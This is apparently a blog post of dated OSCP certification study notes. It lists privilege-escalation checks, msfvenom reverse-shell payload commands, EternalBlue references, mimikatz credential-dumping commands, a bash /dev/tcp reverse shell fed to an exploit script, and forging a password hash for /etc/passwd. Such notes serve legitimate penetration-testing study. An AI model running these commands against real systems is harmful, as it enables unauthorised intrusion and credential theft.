August OSCP Notes

-

August 4, 2020

  1. sudo -u scriptmanager /bin/bash
  2. /bin/bash -i
  3. Sherlock for Windows. linuxprivcheck for Linux.
  4. Domain Controller (DC) is head honcho of Active Directory
  5. Check crontab to see if root is running anything
  6. sudo -l to see what you can do

August 19, 2020

  1. https://www.youtube.com/watch?v=5Tlx7D2djes
  2. Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over.
  3. c:\windows\system32\drivers\etc\hosts <- Use this for LFI (Local file inclusion check for windows os)

August 20, 2020

  1. https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (Has worked before
    2. >
  2. php -S 0.0.0.0:80 exists like python -m SimpleHttpServer 80
  3. ruby -run -e httpd . -p 9000

August 22, 2020

  1. Can create HTA files to execute in Internet Explorer
  2. sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

August 23, 2020

  1. nmap --script vuln -p139,445 192.168.0.18
  2. sudo -i (rage)

August 24, 2020

  1. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.184 LPORT=7777 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
  2. https://nullsec.us/eternalblue-on-windows-xp/
  3. https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/

August 25, 2020

  1. crunch 8 8 -t ,@@^^%%%
  2. 8 min 8 max char

August 30, 2020

  1. privilege::debug
  2. sekurlsa::logonPasswords
  3. sudo apt-get install gcc-multilib

August 31, 2020

  1. ./exploit.py 10.11.1.231 "bash -i >& /dev/tcp/192.168.119.184/9999 0>&1"
  2. openssl passwd evil (gens hash for /etc/passwd file)

Comments

Post a Comment